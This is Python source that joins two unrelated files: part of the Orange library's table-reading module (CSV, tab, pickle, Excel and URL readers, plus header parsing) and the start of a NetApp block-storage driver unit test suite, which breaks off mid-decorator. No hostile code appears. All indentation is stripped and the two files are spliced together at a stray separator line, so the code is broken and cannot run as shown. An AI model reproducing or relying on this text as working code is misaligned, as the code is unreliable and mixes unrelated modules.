# Third row items are flags and column attributes (attr=value)
def header_test3(items):
return all(map(_RE_FLAGS.match, items))
data = iter(data)
header_rows = []
# Try to parse a three-line header
lines = []
try:
lines.append(list(next(data)))
lines.append(list(next(data)))
lines.append(list(next(data)))
except StopIteration:
lines, data = [], chain(lines, data)
if lines:
l1, l2, l3 = lines
# Three-line header if line 2 & 3 match (1st line can be anything)
if header_test2(l2) and header_test3(l3):
header_rows = [l1, l2, l3]
else:
lines, data = [], chain((l1, l2, l3), data)
# Try to parse a single-line header
if not header_rows:
try: lines.append(list(next(data)))
except StopIteration: pass
if lines:
# Header if none of the values in line 1 parses as a number
if not all(is_number(i) for i in lines[0]):
header_rows = [lines[0]]
else:
data = chain(lines, data)
return header_rows, data
@classmethod
def data_table(self, data, headers=None):
"""
Return Orange.data.Table given rows of `headers` (iterable of iterable)
and rows of `data` (iterable of iterable; if ``numpy.ndarray``, might
as well **have it sorted column-major**, e.g. ``order='F'``).
Basically, the idea of subclasses is to produce those two iterables,
however they might.
If `headers` is not provided, the header rows are extracted from `data`,
assuming they precede it.
"""
if not headers:
headers, data = self.parse_headers(data)
# Consider various header types (single-row, two-row, three-row, none)
if 3 == len(headers):
names, types, flags = map(list, headers)
else:
if 1 == len(headers):
HEADER1_FLAG_SEP = '#'
# First row format either:
# 1) delimited column names
# 2) -||- with type and flags prepended, separated by #,
# e.g. d#sex,c#age,cC#IQ
_flags, names = zip(*[i.split(HEADER1_FLAG_SEP, 1) if HEADER1_FLAG_SEP in i else ('', i)
for i in headers[0]])
names = list(names)
elif 2 == len(headers):
names, _flags = map(list, headers)
else:
# Use heuristics for everything
names, _flags = [], []
types = [''.join(filter(str.isupper, flag)).lower() for flag in _flags]
flags = [Flags.join(filter(str.islower, flag)) for flag in _flags]
# Determine maximum row length
rowlen = max(map(len, (names, types, flags)))
def _equal_length(lst):
lst.extend(['']*(rowlen - len(lst)))
return lst
# Ensure all data is of equal width in a column-contiguous array
data = np.array([_equal_length(list(row)) for row in data if any(row)],
copy=False, dtype=object, order='F')
# Data may actually be longer than headers were
try: rowlen = data.shape[1]
except IndexError: pass
else:
for lst in (names, types, flags):
_equal_length(lst)
NAMEGEN = namegen('Feature ', 1)
Xcols, attrs = [], []
Mcols, metas = [], []
Ycols, clses = [], []
Wcols = []
# Iterate through the columns
for col in range(rowlen):
flag = Flags(Flags.split(flags[col]))
if flag.i: continue
type_flag = types and types[col].strip()
try:
orig_values = [np.nan if i in MISSING_VALUES else i
for i in (i.strip() for i in data[:, col])]
except IndexError:
# No data instances leads here
orig_values = []
# In this case, coltype could be anything. It's set as-is
# only to satisfy test_table.TableTestCase.test_append
coltype = DiscreteVariable
coltype_kwargs = {}
valuemap = []
values = orig_values
if type_flag in StringVariable.TYPE_HEADERS:
coltype = StringVariable
elif type_flag in ContinuousVariable.TYPE_HEADERS:
coltype = ContinuousVariable
try:
values = [float(i) for i in orig_values]
except ValueError:
for row, num in enumerate(orig_values):
try: float(num)
except ValueError: break
raise ValueError('Non-continuous value in (1-based) '
'line {}, column {}'.format(row + len(headers) + 1,
col + 1))
elif type_flag in TimeVariable.TYPE_HEADERS:
coltype = TimeVariable
elif (type_flag in DiscreteVariable.TYPE_HEADERS or
_RE_DISCRETE_LIST.match(type_flag)):
if _RE_DISCRETE_LIST.match(type_flag):
valuemap = Flags.split(type_flag)
coltype_kwargs.update(ordered=True)
else:
valuemap = sorted(set(orig_values) - {np.nan})
else:
# No known type specified, use heuristics
is_discrete = is_discrete_values(orig_values)
if is_discrete:
valuemap = sorted(is_discrete)
else:
try: values = [float(i) for i in orig_values]
except ValueError:
tvar = TimeVariable('_')
try: values = [tvar.parse(i) for i in orig_values]
except ValueError:
coltype = StringVariable
else:
coltype = TimeVariable
else:
coltype = ContinuousVariable
if valuemap:
# Map discrete data to ints
def valuemap_index(val):
try: return valuemap.index(val)
except ValueError: return np.nan
values = np.vectorize(valuemap_index, otypes=[float])(orig_values)
coltype = DiscreteVariable
coltype_kwargs.update(values=valuemap)
if coltype is StringVariable:
values = ['' if i is np.nan else i
for i in orig_values]
if flag.m or coltype is StringVariable:
append_to = (Mcols, metas)
elif flag.w:
append_to = (Wcols, None)
elif flag.c:
append_to = (Ycols, clses)
else:
append_to = (Xcols, attrs)
cols, domain_vars = append_to
cols.append(col)
if domain_vars is not None:
if names and names[col]:
# Use existing variable if available
var = coltype.make(names[col].strip(), **coltype_kwargs)
else:
# Never use existing for un-named variables
var = coltype(next(NAMEGEN), **coltype_kwargs)
var.attributes.update(flag.attributes)
domain_vars.append(var)
# Reorder discrete values to match existing variable
if var.is_discrete and not var.ordered:
new_order, old_order = var.values, coltype_kwargs.get('values', var.values)
if new_order != old_order:
offset = len(new_order)
column = values if data.ndim > 1 else data
column += offset
for i, val in enumerate(var.values):
try: oldval = old_order.index(val)
except ValueError: continue
bn.replace(column, offset + oldval, new_order.index(val))
if coltype is TimeVariable:
# Re-parse the values because only now after coltype.make call
# above, variable var is the correct one
values = [var.parse(i) for i in orig_values]
# Write back the changed data. This is needeed to pass the
# correct, converted values into Table.from_numpy below
try: data[:, col] = values
except IndexError: pass
domain = Domain(attrs, clses, metas)
if not data.size:
return Table.from_domain(domain, 0)
table = Table.from_numpy(domain,
data[:, Xcols].astype(float, order='C'),
data[:, Ycols].astype(float, order='C'),
data[:, Mcols].astype(object, order='C'),
data[:, Wcols].astype(float, order='C'))
return table
@staticmethod
def header_names(data):
return ['weights'] * data.has_weights() + \
[v.name for v in chain(data.domain.attributes,
data.domain.class_vars,
data.domain.metas)]
@staticmethod
def header_types(data):
def _vartype(var):
if var.is_continuous or var.is_string:
return var.TYPE_HEADERS[0]
elif var.is_discrete:
return Flags.join(var.values) if var.ordered else var.TYPE_HEADERS[0]
raise NotImplementedError
return ['continuous'] * data.has_weights() + \
[_vartype(v) for v in chain(data.domain.attributes,
data.domain.class_vars,
data.domain.metas)]
@staticmethod
def header_flags(data):
return list(chain(['weight'] * data.has_weights(),
(Flags.join([flag], *('{}={}'.format(*a)
for a in sorted(var.attributes.items())))
for flag, var in chain(zip(repeat(''), data.domain.attributes),
zip(repeat('class'), data.domain.class_vars),
zip(repeat('meta'), data.domain.metas)))))
@classmethod
def write_headers(cls, write, data):
"""`write` is a callback that accepts an iterable"""
write(cls.header_names(data))
write(cls.header_types(data))
write(cls.header_flags(data))
@classmethod
def write_data(cls, write, data):
"""`write` is a callback that accepts an iterable"""
vars = list(chain((ContinuousVariable('_w'),) if data.has_weights() else (),
data.domain.attributes,
data.domain.class_vars,
data.domain.metas))
for row in zip(data.W if data.W.ndim > 1 else data.W[:, np.newaxis],
data.X,
data.Y if data.Y.ndim > 1 else data.Y[:, np.newaxis],
data.metas):
write(['' if isinstance(val, Number) and isnan(val) else
var.values[int(val)] if var.is_discrete else
var.repr_val(val) if isinstance(var, TimeVariable) else
val
for var, val in zip(vars, flatten(row))])
class CSVReader(FileFormat):
"""Reader for comma separated files"""
EXTENSIONS = ('.csv',)
DESCRIPTION = 'Comma-separated values'
DELIMITERS = ',;:\t$ '
SUPPORT_COMPRESSED = True
PRIORITY = 20
def read(self):
for encoding in (lambda: ('us-ascii', None), # fast
lambda: (detect_encoding(self.filename), None), # precise
lambda: (locale.getpreferredencoding(False), None),
lambda: (sys.getdefaultencoding(), None), # desperate
lambda: ('utf-8', None), # ...
lambda: ('utf-8', 'ignore')): # fallback
encoding, errors = encoding()
# Clear the error flag for all except the last check, because
# the error of second-to-last check is stored and shown as warning in owfile
if errors != 'ignore':
error = ''
with self.open(self.filename, mode='rt', newline='',
encoding=encoding, errors=errors) as file:
# Sniff the CSV dialect (delimiter, quotes, ...)
try:
dialect = csv.Sniffer().sniff(file.read(1024), self.DELIMITERS)
except UnicodeDecodeError as e:
error = e
continue
except csv.Error:
dialect = csv.excel()
dialect.delimiter = self.DELIMITERS[0]
file.seek(0)
dialect.skipinitialspace = True
try:
reader = csv.reader(file, dialect=dialect)
data = self.data_table(reader)
if error and isinstance(error, UnicodeDecodeError):
pos, endpos = error.args[2], error.args[3]
warning = ('Skipped invalid byte(s) in position '
'{}{}').format(pos,
('-' + str(endpos)) if (endpos - pos) > 1 else '')
warnings.warn(warning)
self.set_table_metadata(self.filename, data)
return data
except Exception as e:
error = e
continue
raise ValueError('Cannot parse dataset {}: {}'.format(self.filename, error))
@classmethod
def write_file(cls, filename, data):
with cls.open(filename, mode='wt', newline='', encoding='utf-8') as file:
writer = csv.writer(file, delimiter=cls.DELIMITERS[0])
cls.write_headers(writer.writerow, data)
cls.write_data(writer.writerow, data)
cls.write_table_metadata(filename, data)
class TabReader(CSVReader):
"""Reader for tab separated files"""
EXTENSIONS = ('.tab', '.tsv')
DESCRIPTION = 'Tab-separated values'
DELIMITERS = '\t'
PRIORITY = 10
class PickleReader(FileFormat):
"""Reader for pickled Table objects"""
EXTENSIONS = ('.pickle', '.pkl')
DESCRIPTION = 'Pickled Python object file'
def read(self):
with open(self.filename, 'rb') as f:
return pickle.load(f)
@staticmethod
def write_file(filename, data):
with open(filename, 'wb') as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
class BasketReader(FileFormat):
"""Reader for basket (sparse) files"""
EXTENSIONS = ('.basket', '.bsk')
DESCRIPTION = 'Basket file'
def read(self):
def constr_vars(inds):
if inds:
return [ContinuousVariable(x.decode("utf-8")) for _, x in
sorted((ind, name) for name, ind in inds.items())]
X, Y, metas, attr_indices, class_indices, meta_indices = \
_io.sparse_read_float(self.filename.encode(sys.getdefaultencoding()))
attrs = constr_vars(attr_indices)
classes = constr_vars(class_indices)
meta_attrs = constr_vars(meta_indices)
domain = Domain(attrs, classes, meta_attrs)
return Table.from_numpy(
domain, attrs and X, classes and Y, metas and meta_attrs)
class ExcelReader(FileFormat):
"""Reader for excel files"""
EXTENSIONS = ('.xls', '.xlsx')
DESCRIPTION = 'Mircosoft Excel spreadsheet'
def __init__(self, filename):
super().__init__(filename)
from xlrd import open_workbook
self.workbook = open_workbook(self.filename)
@property
@lru_cache(1)
def sheets(self):
return self.workbook.sheet_names()
def read(self):
import xlrd
wb = xlrd.open_workbook(self.filename, on_demand=True)
if self.sheet:
ss = wb.sheet_by_name(self.sheet)
else:
ss = wb.sheet_by_index(0)
try:
first_row = next(i for i in range(ss.nrows) if any(ss.row_values(i)))
first_col = next(i for i in range(ss.ncols) if ss.cell_value(first_row, i))
row_len = ss.row_len(first_row)
cells = filter(any,
[[str(ss.cell_value(row, col)) if col < ss.row_len(row) else ''
for col in range(first_col, row_len)]
for row in range(first_row, ss.nrows)])
table = self.data_table(cells)
except Exception:
raise IOError("Couldn't load spreadsheet from " + self.filename)
return table
class DotReader(FileFormat):
"""Writer for dot (graph) files"""
EXTENSIONS = ('.dot', '.gv')
DESCRIPTION = 'Dot graph description'
SUPPORT_COMPRESSED = True
@classmethod
def write_graph(cls, filename, graph):
from sklearn import tree
tree.export_graphviz(graph, out_file=cls.open(filename, 'wt'))
@classmethod
def write(cls, filename, tree):
if type(tree) == dict:
tree = tree['tree']
cls.write_graph(filename, tree)
class UrlReader(FileFormat):
def read(self):
self.filename = self._trim(self._resolve_redirects(self.filename))
with contextlib.closing(urlopen(self.filename, timeout=10)) as response:
name = self._suggest_filename(response.headers['content-disposition'])
with NamedTemporaryFile(suffix=name, delete=False) as f:
f.write(response.read())
# delete=False is a workaround for https://bugs.python.org/issue14243
reader = self.get_reader(f.name)
data = reader.read()
unlink(f.name)
# Override name set in from_file() to avoid holding the temp prefix
data.name = path.splitext(name)[0]
data.origin = self.filename
return data
def _resolve_redirects(self, url):
# Resolve (potential) redirects to a final URL
with contextlib.closing(urlopen(url, timeout=10)) as response:
return response.url
def _trim(self, url):
URL_TRIMMERS = (
self._trim_googlesheet_url,
)
for trim in URL_TRIMMERS:
try:
url = trim(url)
except ValueError:
continue
else:
break
return url
def _trim_googlesheet_url(self, url):
match = re.match(r'(?:https?://)?(?:www\.)?'
'docs\.google\.com/spreadsheets/d/'
'(?P<workbook_id>[-\w_]+)'
'(?:/.*?gid=(?P<sheet_id>\d+).*|.*)?',
url, re.IGNORECASE)
try:
workbook, sheet = match.group('workbook_id'), match.group('sheet_id')
if not workbook:
raise ValueError
except (AttributeError, ValueError):
raise ValueError
url = 'https://docs.google.com/spreadsheets/d/{}/export?format=tsv'.format(workbook)
if sheet:
url += '&gid=' + sheet
return url
def _suggest_filename(self, content_disposition):
default_name = re.sub(r'[\\:/]', '_', urlparse(self.filename).path)
# See https://tools.ietf.org/html/rfc6266#section-4.1
matches = re.findall(r"filename\*?=(?:\"|.{0,10}?'[^']*')([^\"]+)",
content_disposition or '')
return urlunquote(matches[-1]) if matches else default_name
| |
# Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2014 Andrew Kerr. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# Copyright (c) 2015 Goutham Pacha Ravi. All rights reserved.
# Copyright (c) 2015 Dustin Schoenbrun. All rights reserved.
# Copyright (c) 2016 Chuck Fouts. All rights reserved.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Mock unit tests for the NetApp block storage library
"""
import copy
import uuid
import mock
from oslo_log import versionutils
from oslo_utils import units
import six
from jacket.storage import exception
from jacket.storage.i18n import _, _LW
from jacket.storage import test
from jacket.tests.storage.unit.volume.drivers.netapp.dataontap import fakes as fake
import jacket.tests.storage.unit.volume.drivers.netapp.fakes as na_fakes
from jacket.storage.volume.drivers.netapp.dataontap import block_base
from jacket.storage.volume.drivers.netapp.dataontap.client import api as netapp_api
from jacket.storage.volume.drivers.netapp import utils as na_utils
from jacket.storage.volume import utils as volume_utils
class NetAppBlockStorageLibraryTestCase(test.TestCase):
def setUp(self):
super(NetAppBlockStorageLibraryTestCase, self).setUp()
kwargs = {'configuration': self.get_config_base()}
self.library = block_base.NetAppBlockStorageLibrary(
'driver', 'protocol', **kwargs)
self.library.zapi_client = mock.Mock()
self.zapi_client = self.library.zapi_client
self.mock_request = mock.Mock()
def tearDown(self):
super(NetAppBlockStorageLibraryTestCase, self).tearDown()
def get_config_base(self):
return na_fakes.create_configuration()
@mock.patch.object(versionutils, 'report_deprecated_feature')
def test_get_reserved_percentage_default_multipler(self, mock_report):
default = 1.2
reserved_percentage = 20.0
self.library.configuration.netapp_size_multiplier = default
self.library.configuration.reserved_percentage = reserved_percentage
result = self.library._get_reserved_percentage()
self.assertEqual(reserved_percentage, result)
self.assertFalse(mock_report.called)
@mock.patch.object(versionutils, 'report_deprecated_feature')
def test_get_reserved_percentage(self, mock_report):
multiplier = 2.0
self.library.configuration.netapp_size_multiplier = multiplier
result = self.library._get_reserved_percentage()
reserved_ratio = round(1 - (1 / multiplier), 2)
reserved_percentage = 100 * int(reserved_ratio)
self.assertEqual(reserved_percentage, result)
msg = _LW('The "netapp_size_multiplier" configuration option is '
'deprecated and will be removed in the Mitaka release. '
'Please set "reserved_percentage = %d" instead.') % (
result)
mock_report.assert_called_once_with(block_base.LOG, msg)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr',
mock.Mock(return_value={'Volume': 'FAKE_CMODE_VOL1'}))
def test_get_pool(self):
pool = self.library.get_pool({'name': 'volume-fake-uuid'})
self.assertEqual('FAKE_CMODE_VOL1', pool)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr',
mock.Mock(return_value=None))
def test_get_pool_no_metadata(self):
pool = self.library.get_pool({'name': 'volume-fake-uuid'})
self.assertIsNone(pool)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr',
mock.Mock(return_value=dict()))
def test_get_pool_volume_unknown(self):
pool = self.library.get_pool({'name': 'volume-fake-uuid'})
self.assertIsNone(pool)
def test_create_volume(self):
volume_size_in_bytes = int(fake.SIZE) * units.Gi
self.mock_object(na_utils, 'get_volume_extra_specs')
self.mock_object(na_utils, 'log_extra_spec_warnings')
self.mock_object(block_base, 'LOG')
self.mock_object(volume_utils, 'extract_host', mock.Mock(
return_value=fake.POOL_NAME))
self.mock_object(self.library, '_setup_qos_for_volume',
mock.Mock(return_value=None))
self.mock_object(self.library, '_create_lun')
self.mock_object(self.library, '_create_lun_handle')
self.mock_object(self.library, '_add_lun_to_table')
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
self.library.create_volume(fake.VOLUME)
self.library._create_lun.assert_called_once_with(
fake.POOL_NAME, fake.LUN_NAME, volume_size_in_bytes,
fake.LUN_METADATA, None)
self.assertEqual(0, self.library.
_mark_qos_policy_group_for_deletion.call_count)
self.assertEqual(0, block_base.LOG.error.call_count)
def test_create_volume_no_pool(self):
self.mock_object(volume_utils, 'extract_host', mock.Mock(
return_value=None))
self.assertRaises(exception.InvalidHost, self.library.create_volume,
fake.VOLUME)
def test_create_volume_exception_path(self):
self.mock_object(block_base, 'LOG')
self.mock_object(na_utils, 'get_volume_extra_specs')
self.mock_object(self.library, '_setup_qos_for_volume',
mock.Mock(return_value=None))
self.mock_object(self.library, '_create_lun', mock.Mock(
side_effect=Exception))
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
self.assertRaises(exception.VolumeBackendAPIException,
self.library.create_volume, fake.VOLUME)
self.assertEqual(1, self.library.
_mark_qos_policy_group_for_deletion.call_count)
self.assertEqual(1, block_base.LOG.exception.call_count)
def test_create_volume_no_pool_provided_by_scheduler(self):
fake_volume = copy.deepcopy(fake.VOLUME)
# Set up fake volume whose 'host' field is missing pool information.
fake_volume['host'] = '%s@%s' % (fake.HOST_NAME, fake.BACKEND_NAME)
self.assertRaises(exception.InvalidHost, self.library.create_volume,
fake_volume)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_or_create_igroup')
def test_map_lun(self, mock_get_or_create_igroup, mock_get_lun_attr):
os = 'linux'
protocol = 'fcp'
self.library.host_type = 'linux'
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
'iscsi')
self.zapi_client.map_lun.return_value = '1'
lun_id = self.library._map_lun('fake_volume',
fake.FC_FORMATTED_INITIATORS,
protocol, None)
self.assertEqual('1', lun_id)
mock_get_or_create_igroup.assert_called_once_with(
fake.FC_FORMATTED_INITIATORS, protocol, os)
self.zapi_client.map_lun.assert_called_once_with(
fake.LUN_PATH, fake.IGROUP1_NAME, lun_id=None)
@mock.patch.object(block_base.NetAppBlockStorageLibrary, '_get_lun_attr')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_or_create_igroup')
@mock.patch.object(block_base, 'LOG', mock.Mock())
def test_map_lun_mismatch_host_os(
self, mock_get_or_create_igroup, mock_get_lun_attr):
os = 'windows'
protocol = 'fcp'
self.library.host_type = 'linux'
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
'iscsi')
self.library._map_lun('fake_volume',
fake.FC_FORMATTED_INITIATORS,
protocol, None)
mock_get_or_create_igroup.assert_called_once_with(
fake.FC_FORMATTED_INITIATORS, protocol,
self.library.host_type)
self.zapi_client.map_lun.assert_called_once_with(
fake.LUN_PATH, fake.IGROUP1_NAME, lun_id=None)
self.assertEqual(1, block_base.LOG.warning.call_count)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_or_create_igroup')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_find_mapped_lun_igroup')
def test_map_lun_preexisting(self, mock_find_mapped_lun_igroup,
mock_get_or_create_igroup, mock_get_lun_attr):
os = 'linux'
protocol = 'fcp'
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
'iscsi')
mock_find_mapped_lun_igroup.return_value = (fake.IGROUP1_NAME, '2')
self.zapi_client.map_lun.side_effect = netapp_api.NaApiError
lun_id = self.library._map_lun(
'fake_volume', fake.FC_FORMATTED_INITIATORS, protocol, None)
self.assertEqual('2', lun_id)
mock_find_mapped_lun_igroup.assert_called_once_with(
fake.LUN_PATH, fake.FC_FORMATTED_INITIATORS)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_or_create_igroup')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_find_mapped_lun_igroup')
def test_map_lun_api_error(self, mock_find_mapped_lun_igroup,
mock_get_or_create_igroup, mock_get_lun_attr):
os = 'linux'
protocol = 'fcp'
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
'iscsi')
mock_find_mapped_lun_igroup.return_value = (None, None)
self.zapi_client.map_lun.side_effect = netapp_api.NaApiError
self.assertRaises(netapp_api.NaApiError, self.library._map_lun,
'fake_volume', fake.FC_FORMATTED_INITIATORS,
protocol, None)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_find_mapped_lun_igroup')
def test_unmap_lun(self, mock_find_mapped_lun_igroup):
mock_find_mapped_lun_igroup.return_value = (fake.IGROUP1_NAME, 1)
self.library._unmap_lun(fake.LUN_PATH, fake.FC_FORMATTED_INITIATORS)
self.zapi_client.unmap_lun.assert_called_once_with(fake.LUN_PATH,
fake.IGROUP1_NAME)
def test_find_mapped_lun_igroup(self):
self.assertRaises(NotImplementedError,
self.library._find_mapped_lun_igroup,
fake.LUN_PATH,
fake.FC_FORMATTED_INITIATORS)
def test_has_luns_mapped_to_initiators(self):
self.zapi_client.has_luns_mapped_to_initiators.return_value = True
self.assertTrue(self.library._has_luns_mapped_to_initiators(
fake.FC_FORMATTED_INITIATORS))
self.zapi_client.has_luns_mapped_to_initiators.assert_called_once_with(
fake.FC_FORMATTED_INITIATORS)
def test_get_or_create_igroup_preexisting(self):
self.zapi_client.get_igroup_by_initiators.return_value = [fake.IGROUP1]
self.library._create_igroup_add_initiators = mock.Mock()
igroup_name, host_os, ig_type = self.library._get_or_create_igroup(
fake.FC_FORMATTED_INITIATORS, 'fcp', 'linux')
self.assertEqual(fake.IGROUP1_NAME, igroup_name)
self.assertEqual('linux', host_os)
self.assertEqual('fcp', ig_type)
self.zapi_client.get_igroup_by_initiators.assert_called_once_with(
fake.FC_FORMATTED_INITIATORS)
self.assertEqual(
0, self.library._create_igroup_add_initiators.call_count)
@mock.patch.object(uuid, 'uuid4', mock.Mock(return_value=fake.UUID1))
def test_get_or_create_igroup_none_preexisting(self):
"""This method also tests _create_igroup_add_initiators."""
self.zapi_client.get_igroup_by_initiators.return_value = []
igroup_name, os, ig_type = self.library._get_or_create_igroup(
fake.FC_FORMATTED_INITIATORS, 'fcp', 'linux')
self.assertEqual('openstack-' + fake.UUID1, igroup_name)
self.zapi_client.create_igroup.assert_called_once_with(
igroup_name, 'fcp', 'linux')
self.assertEqual(len(fake.FC_FORMATTED_INITIATORS),
self.zapi_client.add_igroup_initiator.call_count)
self.assertEqual('linux', os)
self.assertEqual('fcp', ig_type)
def test_get_fc_target_wwpns(self):
self.assertRaises(NotImplementedError,
self.library._get_fc_target_wwpns)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_build_initiator_target_map')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_map_lun')
def test_initialize_connection_fc(self, mock_map_lun,
mock_build_initiator_target_map):
self.maxDiff = None
mock_map_lun.return_value = '1'
mock_build_initiator_target_map.return_value = (fake.FC_TARGET_WWPNS,
fake.FC_I_T_MAP, 4)
target_info = self.library.initialize_connection_fc(fake.FC_VOLUME,
fake.FC_CONNECTOR)
self.assertDictEqual(target_info, fake.FC_TARGET_INFO)
mock_map_lun.assert_called_once_with(
'fake_volume', fake.FC_FORMATTED_INITIATORS, 'fcp', None)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_build_initiator_target_map')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_map_lun')
def test_initialize_connection_fc_no_wwpns(
self, mock_map_lun, mock_build_initiator_target_map):
mock_map_lun.return_value = '1'
mock_build_initiator_target_map.return_value = (None, None, 0)
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_fc,
fake.FC_VOLUME,
fake.FC_CONNECTOR)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_has_luns_mapped_to_initiators')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_unmap_lun')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr')
def test_terminate_connection_fc(self, mock_get_lun_attr, mock_unmap_lun,
mock_has_luns_mapped_to_initiators):
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH}
mock_unmap_lun.return_value = None
mock_has_luns_mapped_to_initiators.return_value = True
target_info = self.library.terminate_connection_fc(fake.FC_VOLUME,
fake.FC_CONNECTOR)
self.assertDictEqual(target_info, fake.FC_TARGET_INFO_EMPTY)
mock_unmap_lun.assert_called_once_with(fake.LUN_PATH,
fake.FC_FORMATTED_INITIATORS)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_build_initiator_target_map')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_has_luns_mapped_to_initiators')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_unmap_lun')
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_lun_attr')
def test_terminate_connection_fc_no_more_luns(
self, mock_get_lun_attr, mock_unmap_lun,
mock_has_luns_mapped_to_initiators,
mock_build_initiator_target_map):
mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH}
mock_unmap_lun.return_value = None
mock_has_luns_mapped_to_initiators.return_value = False
mock_build_initiator_target_map.return_value = (fake.FC_TARGET_WWPNS,
fake.FC_I_T_MAP, 4)
target_info = self.library.terminate_connection_fc(fake.FC_VOLUME,
fake.FC_CONNECTOR)
self.assertDictEqual(target_info, fake.FC_TARGET_INFO_UNMAP)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_fc_target_wwpns')
def test_build_initiator_target_map_no_lookup_service(
self, mock_get_fc_target_wwpns):
self.library.lookup_service = None
mock_get_fc_target_wwpns.return_value = fake.FC_FORMATTED_TARGET_WWPNS
(target_wwpns, init_targ_map, num_paths) = \
self.library._build_initiator_target_map(fake.FC_CONNECTOR)
self.assertSetEqual(set(fake.FC_TARGET_WWPNS), set(target_wwpns))
self.assertDictEqual(fake.FC_I_T_MAP_COMPLETE, init_targ_map)
self.assertEqual(0, num_paths)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_get_fc_target_wwpns')
def test_build_initiator_target_map_with_lookup_service(
self, mock_get_fc_target_wwpns):
self.library.lookup_service = mock.Mock()
self.library.lookup_service.get_device_mapping_from_network.\
return_value = fake.FC_FABRIC_MAP
mock_get_fc_target_wwpns.return_value = fake.FC_FORMATTED_TARGET_WWPNS
(target_wwpns, init_targ_map, num_paths) = \
self.library._build_initiator_target_map(fake.FC_CONNECTOR)
self.assertSetEqual(set(fake.FC_TARGET_WWPNS), set(target_wwpns))
self.assertDictEqual(fake.FC_I_T_MAP, init_targ_map)
self.assertEqual(4, num_paths)
@mock.patch.object(na_utils, 'check_flags')
def test_do_setup_san_configured(self, mock_check_flags):
self.library.configuration.netapp_lun_ostype = 'windows'
self.library.configuration.netapp_host_type = 'solaris'
self.library.configuration.netapp_lun_space_reservation = 'disabled'
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertEqual('windows', self.library.lun_ostype)
self.assertEqual('solaris', self.library.host_type)
@mock.patch.object(na_utils, 'check_flags')
def test_do_setup_san_unconfigured(self, mock_check_flags):
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.configuration.netapp_lun_space_reservation = 'enabled'
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertEqual('linux', self.library.lun_ostype)
self.assertEqual('linux', self.library.host_type)
def test_do_setup_space_reservation_disabled(self):
self.mock_object(na_utils, 'check_flags')
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.configuration.netapp_lun_space_reservation = 'disabled'
self.library.do_setup(mock.Mock())
self.assertEqual('false', self.library.lun_space_reservation)
def test_do_setup_space_reservation_enabled(self):
self.mock_object(na_utils, 'check_flags')
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.configuration.netapp_lun_space_reservation = 'enabled'
self.library.do_setup(mock.Mock())
self.assertEqual('true', self.library.lun_space_reservation)
def test_get_existing_vol_manage_missing_id_path(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.library._get_existing_vol_with_manage_ref,
{})
def test_get_existing_vol_manage_not_found(self):
self.zapi_client.get_lun_by_args.return_value = []
self.assertRaises(exception.ManageExistingInvalidReference,
self.library._get_existing_vol_with_manage_ref,
{'source-id': 'src_id',
'source-name': 'lun_path'})
self.assertEqual(1, self.zapi_client.get_lun_by_args.call_count)
@mock.patch.object(block_base.NetAppBlockStorageLibrary,
'_extract_lun_info',
mock.Mock(return_value=block_base.NetAppLun(
'lun0', 'lun0', '3', {'UUID': 'src_id'})))
